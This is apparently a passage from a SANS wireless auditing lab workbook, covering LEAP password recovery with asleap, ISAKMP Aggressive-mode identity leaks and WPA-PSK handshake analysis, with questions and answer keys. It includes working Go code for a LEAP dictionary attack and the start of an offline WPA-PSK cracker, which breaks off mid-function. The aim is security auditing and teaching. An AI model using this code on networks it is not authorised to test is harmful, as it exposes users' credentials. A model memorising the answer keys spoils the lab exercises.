Question: What is the username of the authenticating user?

Select frame 211, expanding the "Extensible Authentication Protocol" protocol dissector information. The field labeled "Peer Challenge" is the 8-byte challenge from the access point to the authenticating station. Selecting frame 213, we can see that Wireshark has identified another value as the "Peer Challenge".

Question: What is wrong with the "Peer Challenge" in frame 213?

Frame 213 represents the response from the client station to the 8-byte challenge value. Note that Wireshark does not properly identify this frame, labeling it as "Peer Challenge" when it is more appropriately labeled "Peer Response". This field is also incorrectly identified as 8 bytes in length ("Peer Challenge [8]") when the contents of the field are 24 bytes in length, as indicated by the "Count" field.

The next frame in the five-way handshake is the success message from the AP, indicating that the authenticating station's response to the challenge was correct. Examine the last two frames in the five-way handshake and answer the question that follows. Close Wireshark after finishing this step.

Question: How does the client verify the identity of the access point in the last two frames of the five-way handshake?

Lab 8-2: Recover Passwords with Asleap

Purpose: Introduce the use of Asleap as a mechanism to audit the security of Cisco LEAP networks.

Description: In this lab we'll use the Asleap tool to mount a dictionary attack against the supplied Cisco LEAP transactions, potentially revealing the usernames and passwords of legitimate users. Weaknesses in the LEAP challenge/response mechanism offer an easy target for an attacker. An auditor can use Asleap to identify vulnerable LEAP deployments that can be abused by an attacker.
As we saw in the course material, Asleap consists of two components: the "genkeys" tool, which creates the database of NT hashes and passwords, and the "asleap" tool, which examines the LEAP five-way handshake and uses the genkeys database to identify weak user passwords.

8.2.1. Generate an NTLM Hash Database

In this step, we'll use the genkeys tool and the supplied dictionary file to generate the database file and corresponding index file to supply to the asleap tool. First, open an XTerm window and change to the /tmp/lab8 folder, as shown below.

# cd /tmp/lab8
# pwd
/tmp/lab8

Run the genkeys command with no arguments to see a list of command-line options, as shown below.

# genkeys
genkeys 1.4.2 - generates lookup file for asleap.
genkeys: Must supply -r -f and -n
Usage: genkeys [options]
        -r      Input dictionary file, one word per line
        -f      Output pass+hash filename
        -n      Output index filename
        -h      Last 2 hash bytes to filter with (optional)

Using the supplied wordlist file "words" in the lab8 directory, generate the database files to use with asleap, as shown below. Note that this example was generated on a Pentium 4 2.8 GHz system.

# genkeys -r words -f words.dat -n words.idx
genkeys 1.4.2 - generates lookup file for asleap.
Generating hashes for passwords (this may take some time) ...Done.
135426 hashes written in 0.60 seconds: 225487.15 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 1055547 compares
Creating index file (almost finished) ...Done.
# ls -l words.*
-rw-r--r--  1 root root 3813222 2005-04-21 13:53 words.dat
-rw-r--r--  1 root root 1030086 2005-04-21 13:53 words.idx
#

Question: How many hashes/second was your system able to generate?

After generating the database and index files with genkeys, we can proceed to auditing the LEAP challenge/response exchange for weak passwords with asleap.

8.2.2. Identify Weak Passwords

In this step, we'll assess the supplied packet capture files for weak passwords. First, run the "asleap" tool with no arguments to see a list of available command-line options, as shown below.

# asleap
asleap 1.4.2 - actively recover LEAP/PPTP passwords.
asleap: Must supply an interface with -i, or a stored file with -r
Usage: asleap [options]
        -r      Read from a libpcap file
        -i      Interface to capture on
        -f      Dictionary file with NT hashes
        -n      Index file for NT hashes
        -w      Write the LEAP exchange to a libpcap file
        -s      Skip the check to make sure authentication was successful
        -a      Perform an active attack (faster, requires AirJack drivers)
        -c      Specify a channel (defaults to current)
        -o      Perform channel hopping
        -t      Specify a timeout watching for LEAP exchange (default 5 seconds)
        -D      List available devices for live capture
        -h      Output this help information and exit
        -v      Print verbose information (more -v for more verbosity)
        -V      Print program version and exit
        -W      ASCII dictionary file (special purpose)

We can see from the usage options that we can read the LEAP transaction information from a libpcap file with the "-r" option, specifying the genkeys database file with "-f" and the genkeys index file with "-n". Use asleap to assess the LEAP transaction stored in the "leapexch1.dump" capture file with the genkeys files created in the previous step, as shown below:

# asleap -r leapexch1.dump -f words.dat -n words.idx
asleap 1.4.2 - actively recover LEAP/PPTP passwords.
Using the passive attack method.
Captured LEAP exchange information:
        username:       atrager
        challenge:      f92f966625097069
        response:       98c9fba5ebd6cf3596ad605e7b4cd1809416a84105024814
        hash bytes:     586c
        NT hash:        8846f7eaee8fb117ad06bdd830b7586c
        password:       password
Closing pcap ...
#

Question: Was asleap able to recover the username and password included in the leapexch1.dump LEAP transaction?
Question: What was the password reported by asleap?
Question: Does the calculated last 2 bytes of the NTLM hash displayed on the "hash bytes:" line of the asleap output match the last two bytes of the actual user password hash?

Next, assess the contents of the LEAP transaction file stored in the "leapexch2.dump" capture file, as shown below:

# asleap -r leapexch2.dump -f words.dat -n words.idx
asleap 1.4.2 - actively recover LEAP/PPTP passwords.
Using the passive attack method.
Closing pcap ...
#

In this case, the asleap tool did not attempt to recover the password from the LEAP transaction supplied in the capture file. We can increase the verbosity of information reported by asleap by adding the "-v" parameter, as shown below:

# asleap -r leapexch2.dump -f words.dat -n words.idx -v
asleap 1.4.2 - actively recover LEAP/PPTP passwords.
Using the passive attack method.
Captured LEAP challenge:
0802 7500 000a 8a47 d253 0040 9658 2058
0040 9658 2058 90c8 aaaa 0300 0000 888e
0100 0017 01ef 0017 1101 0008 1671 5dc2
cb?? e73f 6174 7261 6765 72ff ffff ff
Captured LEAP response:
0801 3201 0040 9658 2058 000a 8a47 d253
0040 9658 2058 c091 aaaa 0300 0000 888e
0100 0027 02ef 0027 1101 0018 5bf4 fdc2
7dfd 4a0a 96d3 3c23 e762 6a2a 3523 6295
6174 7261 6765 72ff ffff ff
#

Reading the dumps confirms what Wireshark mislabeled in Lab 8-1. After the 802.11 header and the LLC/SNAP header with ethertype 888e come the 802.1X header (0100 0017), the EAP header (code 01 Request, identifier ef, length 0x17) and the LEAP header (type 0x11, version 01, reserved 00, count 08) followed by the 8-byte challenge; the second frame carries EAP code 02 (Response) and count 0x18, that is 24 bytes of response. Both frames end with the username "atrager" in the clear.

Question: Examine the information reported by asleap in verbose reporting mode. What characteristic of this capture file would cause asleap to not attempt to recover the user's password?

asleap saw a challenge and a response but no EAP Success frame, so it treats the exchange as a failed authentication and does not attack it. The "-s" option skips that check if you want to attack such a response anyway; keep in mind that a failed exchange may reflect a mistyped password rather than the user's real one.

Next, assess the contents of the "leapexch3.dump" capture file in the same way:

# asleap -r leapexch3.dump -f words.dat -n words.idx
asleap 1.4.2 - actively recover LEAP/PPTP passwords.
Using the passive attack method.
Captured LEAP exchange information:
        username:       DOFS\jnovak
        challenge:      f622f5c4b0115c27
        response:       322039638c506a67a65c80316a346e7f598560046127f607
        hash bytes:     be5b
Could not find a matching NT hash. Try expanding your password list.
I've given up. Sorry it didn't work out.
Closing pcap ...
#

Question: What can we deduce about the authentication architecture of the network from the username in the leapexch3.dump capture?
Question: What prevented asleap from discovering the password in this file?

In this example, asleap was unable to identify the password for the user "DOFS\jnovak". This is because the password for this user was not present in the input dictionary file supplied to the genkeys tool.
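The "hash bytes:" line and genkeys' "-h" option are the crux of the attack, and the reason asleap's lookup is a filtered index search rather than a full comparison for every word. The following Go program is an added example for this workbook, not the source of asleap or genkeys: it derives the NT hash, computes the LEAP response the way MS-CHAPv1 does, recovers the last two hash bytes from the last eight response bytes with at most 65,536 DES operations, and uses them to skip every dictionary word that cannot match. The challenge is the one asleap printed for leapexch1.dump; the wordlist is constructed, and the 24-byte response is recomputed from the known password rather than copied from the capture. Go's standard library has no MD4, so a small implementation is included.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/binary"
	"math/bits"
)

// md4Sum is a pure-Go MD4 (RFC 1320); Go's standard library ships no MD4.
func md4Sum(data []byte) [16]byte {
	msg := append(append([]byte{}, data...), 0x80)
	for len(msg)%64 != 56 {
		msg = append(msg, 0)
	}
	msg = append(msg, make([]byte, 8)...)
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F, words in order
			a, b, c, d = d, bits.RotateLeft32(a+((b&c)|(^b&d))+x[i], []int{3, 7, 11, 19}[i%4]), b, c
		}
		for i := 0; i < 16; i++ { // round 2: G, words 0,4,8,12,1,5,9,13,...
			a, b, c, d = d, bits.RotateLeft32(a+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, []int{3, 5, 9, 13}[i%4]), b, c
		}
		for i := 0; i < 16; i++ { // round 3: H, words 0,8,4,12,2,10,6,14,...
			k := (i&1)<<3 | (i&2)<<1 | (i&4)>>1 | (i&8)>>3
			a, b, c, d = d, bits.RotateLeft32(a+(b^c^d)+x[k]+0x6ed9eba1, []int{3, 9, 11, 15}[i%4]), b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is MD4 over the UTF-16LE password: asleap's "NT hash" line, and what genkeys stores.
func ntHash(password string) [16]byte {
	var buf []byte
	for _, r := range password {
		buf = append(buf, byte(r), byte(r>>8))
	}
	return md4Sum(buf)
}

// desBlock encrypts one block under a 7-byte key spread to 8 bytes, seven bits
// per byte; the low bit of each byte is DES parity, which the key schedule ignores.
func desBlock(key7, in []byte) []byte {
	var acc uint64
	for _, b := range key7 {
		acc = acc<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		key[i], acc = byte(acc&0x7f)<<1, acc>>7
	}
	blk, _ := des.NewCipher(key) // key is always 8 bytes, so no error
	out := make([]byte, 8)
	blk.Encrypt(out, in)
	return out
}

// leapResponse is the MS-CHAPv1 construction LEAP reuses: zero-pad the NT hash
// to 21 bytes, split into three 7-byte DES keys, encrypt the same challenge
// under each. The third key is hash[14], hash[15] and five zero bytes.
func leapResponse(hash [16]byte, challenge []byte) []byte {
	key := append(hash[:], 0, 0, 0, 0, 0)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desBlock(key[7*i:7*i+7], challenge)...)
	}
	return resp
}

// recoverHashTail brute-forces the 2^16 possible third keys against response
// bytes 16..23: asleap's "hash bytes:" line, computed before any lookup.
func recoverHashTail(challenge, response []byte) (uint16, bool) {
	key := make([]byte, 7)
	for v := 0; v < 1<<16; v++ {
		key[0], key[1] = byte(v>>8), byte(v)
		if bytes.Equal(desBlock(key, challenge), response[16:24]) {
			return uint16(v), true
		}
	}
	return 0, false
}

// dictionaryAttack is genkeys' "-h" filter plus asleap's lookup: only words whose
// NT hash ends in the recovered two bytes get the full three-DES comparison.
func dictionaryAttack(words []string, challenge, response []byte) (string, bool) {
	tail, ok := recoverHashTail(challenge, response)
	if !ok {
		return "", false
	}
	for _, w := range words {
		h := ntHash(w)
		if uint16(h[14])<<8|uint16(h[15]) == tail && bytes.Equal(leapResponse(h, challenge), response) {
			return w, true
		}
	}
	return "", false
}
```

The NT hash of "password" ends in 586c, the "hash bytes" asleap reported above, and only words whose NT hash ends in those two bytes are ever run through the full three-DES comparison. On the 135,426-word list genkeys processed, that filter leaves about two candidates per exchange out of 65,536 possible tail values, which is why asleap's lookup is nearly free once genkeys has done its work, and why the same weakness applies to PPTP's MS-CHAPv1, which asleap's banner also mentions.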
We can expand the dictionary file supplied to genkeys to include more potential passwords and reassess this transaction, if desired.

Assess the LEAP exchange contents in the "leapexch4.dump" capture file, and answer the questions that follow.

Question: Was asleap able to recover the password from the LEAP exchange in the leapexch4.dump capture?
Question: What kind of policies would be required to mitigate the recovery of weak LEAP passwords?
Question: How could an administrator enforce this kind of policy?

This completes our 8th lab exercise. Congratulations.

Answers

Section 8.1.1
Question: How many packets are returned from this new filter?
Answer: 114 packets.
Question: What additional information is included in this packet display?
Answer: EAPOL start, success and key distribution frames are also displayed with the "eapol" display filter.

Section 8.1.2
Question: What is the MAC address of the access point?
Answer: The AP is at 00:40:96:58:20:58.
Question: What is the MAC address of the station?
Answer: The station MAC is 00:0a:8a:47:d2:53.
Question: What is the username of the authenticating user?
Answer: The username is "atrager".
Question: What is wrong with the "Peer Challenge" in frame 213?
Answer: The "Peer Challenge" is actually the 24-byte peer response and is not a "random value" as Wireshark indicates.
Question: How does the client correctly identify the access point in the last 2 frames of the five-way handshake?
Answer: The client forces the AP through a challenge/response of its own: it sends the AP a challenge and checks the response, which an impostor that does not hold the user's credentials cannot produce.

Section 8.2.1
Question: How many hashes/second was your system able to generate?
Answer: This will vary depending on the performance of your system.

Section 8.2.2
Question: Was asleap able to recover the username and password included in the leapexch1.dump LEAP transaction?
Answer: Yes.
Question: What was the password reported by asleap?
Answer: "password"
Question: Does the calculated last 2 bytes of the NTLM hash displayed on the "hash bytes:" line of the asleap output match the last two bytes of the actual user password hash?
Answer: Yes, both values are 0x586c.
Question: Examine the information reported by asleap in verbose reporting mode. What characteristic of this capture file would cause asleap to not attempt to recover the user's password?
Answer: The authentication failed, so asleap does not attempt to recover the password.
Question: What can we deduce about the authentication architecture of the network from the username in the leapexch3.dump capture?
Answer: The authentication architecture is likely a Windows environment where "DOFS" is the Windows domain name.
Question: What prevented asleap from discovering the password in this file?
Answer: The user's password was not in the input dictionary file.
Question: Was asleap able to recover the password from the LEAP exchange in the leapexch4.dump capture?
Answer: Yes, the password is "flounder".
Question: What kind of policies would be required to mitigate the recovery of weak LEAP passwords?
Answer: A strong password selection policy is required.
Question: How could an administrator enforce this kind of policy?
Answer: By rejecting weak passwords when users select them, and by regularly auditing password selection with tools like Asleap.

Lab 9 - Auditing VPN/Segmented Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing VPN/Segmented Networks module. To complete these exercises, you will need the lab files included on the SANS Wireless LAN Auditing Lab CD.

Lab 9-1: Identifying IPSec Traffic

Purpose: Introduce the techniques used to identify ISAKMP traffic from a supplied capture file.

Description: In this lab we'll use a supplied capture file with mixed networks and extract traffic that identifies the presence of IPSec traffic.
We'll look for the presence of the ISAKMP protocol and UDP-tunneled traffic, and identify the method used for ISAKMP negotiation.

9.1.1. Connect to the Classroom Network

Execute the following commands from a shell prompt to connect to the SANS-ROGUE01 network:

# killall dhcpcd
# iwconfig wlan0 essid SANS-ROGUE01 enc off mode managed
# dhcpcd -d wlan0

At this point, your system should be connected to the SANS-ROGUE01 network. If you had trouble getting to this point, please contact a proctor or the instructor for assistance.

9.1.2. Assessing ISAKMP Traffic

Using the "lab9capture.dump" capture file from the lab CD, we can examine sample ISAKMP traffic. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab9 folder and select the "lab9capture.dump" capture file.

Next, apply a display filter that will display only ISAKMP traffic.
(Hint: Use the protocol field name)
(Hint: Use all lower-case letters)
(Hint: The display filter should return 20 packets)
(Hint: "isakmp")

Select the first ISAKMP frame with the source address "172.16.0.99". This is the client system that is initiating the ISAKMP negotiation with the VPN server. Notice that Wireshark has identified this frame as "Aggressive" in the Info column. Expand the fields in the protocol dissector view and answer the following questions. Note that this file has been modified from its original form; errors indicating invalid checksums can be safely ignored.

Question: What IP protocol is used for ISAKMP traffic?
Question: What source port and destination port are used for ISAKMP traffic?
Question: What field identifies the ISAKMP frame as "Aggressive"?
Question: What is the supported encryption mechanism for this client system in transform payload number 10?
(Hint: Expand the security association (SA) payload)
(Hint: Expand the proposal payload #1)
(Hint: Expand the transform payload #10)

Question: What is the identified authentication mechanism in transform payload number 10?
Question: What is the identified hashing algorithm in transform payload number 10?

Next, select the first frame with the source address "192.168.254.254". This is the VPN server system that is responding to the ISAKMP negotiation request with its supported capabilities. Answer the following questions relating to the capability information of this device.

Question: What is the supported encryption protocol for this VPN server?
(Hint: Expand the ISAKMP payload)
(Hint: Expand the security association (SA) payload)
(Hint: Expand the proposal payload #1)
(Hint: Expand the transform payload #10)
Question: What is the supported hashing algorithm for this VPN server?
Question: What is the supported authentication mechanism for this VPN server?

As we can see from this ISAKMP exchange, we can determine several facts about the IPSec server and client systems, including the supported encryption mechanisms, hashing mechanisms and authentication mechanisms.

Recall from the course material that Aggressive mode ISAKMP negotiation shortens the exchange to three frames but exposes identity information: the identification payload is sent before any session key exists, so it is readable by anyone who can capture the wireless traffic. Expand the identification payload to reveal additional details about the IPSec server.

Question: What is the reported protocol and port information in the identification payload?
Question: What does the identification data represent?

Note that the IP address identified in the identification data represents the actual IP address of the VPN server. The "192.168.254.254" IP address reflects the NAT address from a firewall protecting the VPN server, but NAT does not prevent the server from disclosing its internal IP address inside the ISAKMP payload.
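To make the identity leak concrete, here is a small Go parser, added for this workbook and not part of any tool on the lab CD, that reads an ISAKMP header, flags exchange type 4 (Aggressive), walks the payload chain by each payload's next-payload and length fields, and extracts the Identification payload's type, protocol, port and data. The packet it parses is constructed for the example: the SA, key exchange and nonce bodies are placeholders, and the ID payload carries the group name "staff" as ID_KEY_ID over UDP/500, the values the lab's answers give. The length checks reject payloads that claim to run past the packet, which a truncated capture or a fuzzed peer will produce.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

const (
	isakmpHeaderLen    = 28
	exchangeAggressive = 4  // ISAKMP exchange type; 2 is Identity Protection (main mode)
	payloadID          = 5  // Identification payload type
	idTypeKeyID        = 11 // ID_KEY_ID: Cisco clients send the group name this way
)

type ISAKMPSummary struct {
	ExchangeType uint8
	Aggressive   bool
	Payloads     []uint8 // payload types in chain order
	IDType       uint8
	IDProtocol   uint8 // 17 = UDP
	IDPort       uint16
	IDData       string
}

// Summarize parses the 28-byte ISAKMP header and walks the payload chain by
// each payload's next-payload and length fields, keeping the Identification
// payload if one is present. Aggressive mode sends that payload in the very
// first message, before any key is agreed, which is the leak the lab shows.
func Summarize(pkt []byte) (ISAKMPSummary, error) {
	var s ISAKMPSummary
	if len(pkt) < isakmpHeaderLen {
		return s, errors.New("short ISAKMP header")
	}
	total := int(binary.BigEndian.Uint32(pkt[24:]))
	if total < isakmpHeaderLen || total > len(pkt) {
		return s, fmt.Errorf("ISAKMP length %d inconsistent with %d bytes present", total, len(pkt))
	}
	s.ExchangeType = pkt[18]
	s.Aggressive = s.ExchangeType == exchangeAggressive
	next, off := pkt[16], isakmpHeaderLen
	for next != 0 {
		if off+4 > total {
			return s, errors.New("payload header runs past packet")
		}
		plen := int(binary.BigEndian.Uint16(pkt[off+2:]))
		if plen < 4 || off+plen > total {
			return s, fmt.Errorf("payload type %d has bad length %d", next, plen)
		}
		s.Payloads = append(s.Payloads, next)
		if next == payloadID && plen >= 8 {
			body := pkt[off+4 : off+plen]
			s.IDType, s.IDProtocol = body[0], body[1]
			s.IDPort = binary.BigEndian.Uint16(body[2:])
			s.IDData = string(body[4:])
		}
		next, off = pkt[off], off+plen
	}
	return s, nil
}

// sampleAggressive is a constructed Aggressive-mode message 1: SA, KE and
// nonce bodies are placeholders; the ID payload carries the group name "staff"
// as ID_KEY_ID over UDP/500, the values the lab's answers give.
func sampleAggressive() []byte {
	payload := func(nextType byte, body []byte) []byte {
		p := []byte{nextType, 0, 0, 0}
		binary.BigEndian.PutUint16(p[2:], uint16(4+len(body)))
		return append(p, body...)
	}
	pkt := make([]byte, isakmpHeaderLen)
	copy(pkt, []byte{0xde, 0xad, 0xbe, 0xef, 0x01, 0x02, 0x03, 0x04}) // initiator cookie
	pkt[16] = 1    // first payload in the chain: SA
	pkt[17] = 0x10 // ISAKMP version 1.0
	pkt[18] = exchangeAggressive
	pkt = append(pkt, payload(4, make([]byte, 8))...)  // SA, next = KE
	pkt = append(pkt, payload(10, make([]byte, 8))...) // KE, next = Nonce
	pkt = append(pkt, payload(5, make([]byte, 8))...)  // Nonce, next = ID
	idBody := append([]byte{idTypeKeyID, 17, 0x01, 0xf4}, "staff"...)
	pkt = append(pkt, payload(0, idBody)...) // ID, last payload in the chain
	binary.BigEndian.PutUint32(pkt[24:], uint32(len(pkt)))
	return pkt
}
```

The same walk over the responder's reply returns its identification payload; an ID_IPV4_ADDR (type 1) arrives as four raw bytes in IDData, which is the internal address the lab notes leaking through the NAT. A main-mode (exchange type 2) first message parses just as well, but its ID payload only appears later, under the negotiated encryption.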
Disclosing the internal address in this way gives the attacker additional information about the characteristics of the network that can be valuable in other attacks.

Next, remove the display filter to reveal additional capture information in this trace. Scroll to the traffic that follows the ISAKMP negotiation and answer the questions that follow.

Question: What IP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation?
Question: What port number is used for the upper-layer traffic encapsulation protocol?
Question: What is the likely vendor associated with the port number used for traffic encapsulation?

9.1.3. Assessing Traffic with EtherApe

EtherApe is a great example of a powerful open-source tool that has a wide variety of uses. From the perspective of auditing wireless networks, EtherApe is useful in characterizing traffic on the network, including the ability to identify traffic patterns that can reveal the use of a VPN server for wireless network security.

Note: At the time of this writing, EtherApe recognizes a limited number of link-layer encapsulation methods. For this reason, EtherApe cannot graph the activity on the wireless network unless the station is connected to the wireless network. Future versions of this tool may support monitoring the network while in RFMON mode as well.

First, start EtherApe by clicking "K > Backtrack > Sniffers > EtherApe". Backtrack will start EtherApe with the first interface name it recognizes, which is "lo". This produces an error, as shown:

    Link type not yet supported

EtherApe unsupported link type error.

Click OK to acknowledge this error. Next, click "Capture > Interfaces > wlan0" to select the wireless card as the monitoring data source. EtherApe will immediately begin to graph the activity on the network, identifying active hosts and protocols. Since this open wireless network is a shared medium, EtherApe can observe all traffic on the network and document it accordingly. (On a WPA network, a station in managed mode would only see its own unicast traffic plus broadcast and multicast frames, since every station holds its own pairwise key.)
The default configuration of EtherApe is to graph activity from hosts in the "instant" view, where the hosts that are currently communicating the most are indicated with thick interconnecting lines, as shown below. This doesn't provide us with a strong overall sense of the activity on the network, since the interconnecting lines only indicate the current bandwidth utilization on the network.

EtherApe screen using the instant view for traffic representation.

We can change the behavior of EtherApe so that the size of each node reflects accumulated traffic. Select the preferences icon on the EtherApe screen and change the "Node size variable" option to "Accum. traffic (In+Out)", as shown below. Click OK to close the preferences window.

EtherApe preferences dialog box.

Question: What characteristic of node traffic indicates a host that is transmitting and receiving a significant amount of traffic?
Question: What characteristics would indicate the presence of a VPN server on the wireless network?

Work with a lab partner to generate traffic on the wireless network, noting the corresponding activity in EtherApe. From an XTerm, use different tools such as ping, nmap and netcat to generate traffic. For example, working with a partner you can designate a client and a server to transfer files with netcat as shown below (initiate the server before the client). Create a 10 MB file of random data, then establish a netcat server to transfer the file.
root@1[root]# dd if=/dev/urandom bs=1024 count=10000 of=data
10000+0 records in
10000+0 records out
10240000 bytes transferred in 5.869933 seconds (1744483 bytes/sec)
root@1[root]# ls -l data
-rw-r--r--  1 root root 10240000 Sep 21 07:53 data
root@1[root]# nc -l -n -vv -p 18000 < data
(UNKNOWN) [10.0.0.104] 18000 open
 sent 0, rcvd 10240000
root@1[root]#

The client connects to the server's IP address on port 18000 with netcat and redirects the output to a file. Press CTRL-C on the client to end the transfer once EtherApe indicates the file transfer has completed. You may need to reduce the maximum node size in the EtherApe options if there is too much traffic on the network to recognize different transactions. Repeat this procedure using different file sizes and different port numbers. Which hosts generate the greatest amount of traffic on the network?

This completes our 9th lab exercise. Congratulations.

Answers

Section 9.1.2
Question: What IP protocol is used for ISAKMP traffic?
Answer: UDP.
Question: What source port and destination port are used for ISAKMP traffic?
Answer: Source and destination port 500 are used.
Question: What field identifies the ISAKMP frame as "Aggressive"?
Answer: The ISAKMP exchange type has a value of 4, indicating an aggressive mode exchange.
Question: What is the supported encryption mechanism for this client system in transform payload number 10?
Answer: Triple DES in CBC mode (3DES-CBC).
Question: What is the identified authentication mechanism in transform payload number 10?
Answer: XAUTHInitPreShared, or pre-shared key authentication combined with extended (user) authentication.
Question: What is the identified hashing algorithm in transform payload number 10?
Answer: MD5.
Question: What IP protocol is used to encapsulate IPSec traffic following the ISAKMP negotiation?
Answer: UDP.
Question: What is the reported protocol and port information in the identification payload?
Answer: Port 500.
Question: What does the identification data represent?
Answer: The identification data "staff"
indicates the group name that is being used for the pre-shared key authentication.
Question: What port number is used for the upper-layer traffic encapsulation protocol?
Answer: 10,000 for both source and destination port, to encapsulate the traffic for NAT traversal.
Question: What is the likely vendor associated with the port number used for traffic encapsulation?
Answer: Port 10,000 is commonly used for ISAKMP-NAT encapsulated traffic with Cisco equipment.

Lab 10 - Auditing WPA/PSK Networks

Complete the exercises in this lab to reinforce the material covered in the Auditing WPA/PSK Networks module. To complete these exercises, you will need the lab files included on the SANS Wireless LAN Auditing Lab CD.

Lab 10-1: Auditing WPA/PSK Networks

Purpose: Introduce the techniques used to identify and audit WPA/PSK networks.

Description: In this lab we'll use supplied capture files and extract the traffic that identifies a WPA/PSK network: the beacon frames that advertise the cipher and authentication suites, and the four-way handshake that an offline dictionary attack against the PSK depends on.

10.1.1. Assessing WPA/PSK Traffic

Using the supplied capture files on the lab CD, we can examine sample traffic from WPA/PSK networks. Start the Wireshark sniffer by clicking "K > Run Command..." to open the Run Command dialog box. Enter "wireshark" in the command text-box, then click the Run button. Open the capture file for this lab by clicking "File > Open", navigate to the /tmp/lab10 folder and select the "lab10capture1.dump" capture file.

Next, apply a display filter that will display only beacon frames.
(Hint: Select the frame type/subtype field of a beacon frame)
(Hint: The display filter should return 73 frames)
(Hint: The display field name is "wlan.fc.type_subtype")
(Hint: The type/subtype for beacon frames is "8")
(Hint: "wlan.fc.type_subtype == 8")

Next, select a beacon frame and expand the tagged management parameters tree.
Inspect the tagged management parameters, and answer the questions that follow.

Question: What is the SSID for this network?
Question: What is the encryption protocol used for unicast traffic on this network?
Question: What is the encryption protocol used for multicast traffic on this network?
Question: What is the authentication method used for this network?

By inspecting the information in beacon frames, we can identify the encryption mechanism in use for WPA networks, as well as the authentication mechanism. Now that we have determined that this network uses TKIP and a pre-shared key (PSK) for authentication, let's inspect the information in the four-way handshake.

10.1.2. Identifying the Four-Way Handshake

Using the "lab10capture1.dump" file, apply a filter to display only EAPOL traffic.
(Hint: Clear the existing display filter to display all packets)
(Hint: Look at the information displayed in the "Protocol" field for a display name)
(Hint: Look at frame number 43)
(Hint: The display filter should return four frames)
(Hint: "eapol")

After applying the display filter, select the first EAPOL frame and expand the "802.1x Authentication" protocol dissector tree, as shown below.

Wireshark protocol dissector view of 802.1X authentication data.

The four frames displayed by Wireshark represent the four-way handshake of the TKIP key exchange. Inspecting the 802.1X authentication information in the first frame (frame number 43), we can see the reported nonce information.

Question: Is the first frame in the four-way handshake from the supplicant or the authenticator?
(Hint: Inspect the frame control flags)
(Hint: Is From DS or To DS set?)
(Hint: Compare the source address to the BSSID)

Since the source address matches the BSSID, we can determine that the first frame is from the AP, initiating the four-way handshake. Note that the MIC field in the first part of the four-way handshake is all
zeros, since the AP does not yet have enough information to calculate the PTK, and the key that computes the MIC (the KCK) is part of the PTK.

Next, select the second frame in the four-way handshake. This frame includes an additional nonce value that represents the supplicant nonce, since it is transmitted from the wireless station. Note that the MIC value is present in this frame, since the supplicant now has enough information to calculate the PTK (authenticator address, supplicant address, authenticator nonce and now the supplicant nonce). Note that the "WPA Key" data field in part two of the four-way handshake includes the capability information of the client system. In this case, the capability information matches what is advertised in the beacon frames (TKIP protocol, WPA-PSK for authentication). This information can be helpful in troubleshooting clients that are not successfully completing the four-way handshake due to incompatible cipher suites and authentication methods.

Next, select the third frame in the four-way handshake. Now that the AP has the supplicant nonce value, it can calculate the PTK and verify the MIC value transmitted from the supplicant in part two of the four-way handshake. Between frames two and three, the AP verifies the supplicant's PMK (and by extension, the PSK) by comparing the observed MIC in part two of the four-way handshake with the MIC it calculates for the same frame. If the observed and calculated MICs match, the AP issues part three of the four-way handshake, effectively informing the client station that it has successfully authenticated. Everything the AP needs for that comparison (both addresses, both nonces and the frame that carries the MIC) is visible in the first two frames, which is why a captured handshake is all an offline attacker needs. Only the PMK is missing, and on a PSK network the PMK is derived from nothing more than the passphrase and the SSID.

Next, select frame four of the four-way handshake. This frame acknowledges the receipt and content of the third frame, but provides little in the way of authentication since both stations have already demonstrated knowledge of the PTK.
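What the AP does between messages 2 and 3 is exactly what an offline attacker repeats for every candidate passphrase. The following Go program is an added example for this workbook, not code taken from coWPAtty, and shows the whole chain: PBKDF2-HMAC-SHA1 from passphrase and SSID to PMK, PRF-512 to PTK, KCK = PTK[0:16], and the MIC over the EAPOL-Key frame with its MIC field zeroed (HMAC-MD5 for key descriptor version 1, the WPA/TKIP case in lab10capture1.dump, HMAC-SHA1 truncated to 16 bytes for version 2, the WPA2/CCMP case). The handshake it attacks is constructed rather than read from the capture: SSID "SANS" and passphrase "avocation" are the lab's values, while the MAC addresses and nonces are made up and the message 2 frame is assembled inline.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/md5"
	"crypto/sha1"
	"encoding/binary"
)

const micOffset = 81 // 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC

// pmk is PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32): the slow step per word, and the only one genpmk can precompute per SSID.
func pmk(passphrase, ssid string) []byte {
	var out []byte
	for block := uint32(1); len(out) < 32; block++ {
		m := hmac.New(sha1.New, []byte(passphrase))
		m.Write(append([]byte(ssid), byte(block>>24), byte(block>>16), byte(block>>8), byte(block)))
		u := m.Sum(nil)
		t := append([]byte{}, u...)
		for i := 1; i < 4096; i++ {
			m.Reset()
			m.Write(u)
			u = m.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:32]
}

// ptk is the 802.11i PRF-512 over both MAC addresses and both nonces, each pair ordered low-to-high; KCK is its first 16 bytes.
func ptk(pmkBytes, aa, spa, anonce, snonce []byte) []byte {
	ordered := func(x, y []byte) []byte {
		if bytes.Compare(x, y) > 0 {
			x, y = y, x
		}
		return append(append([]byte{}, x...), y...)
	}
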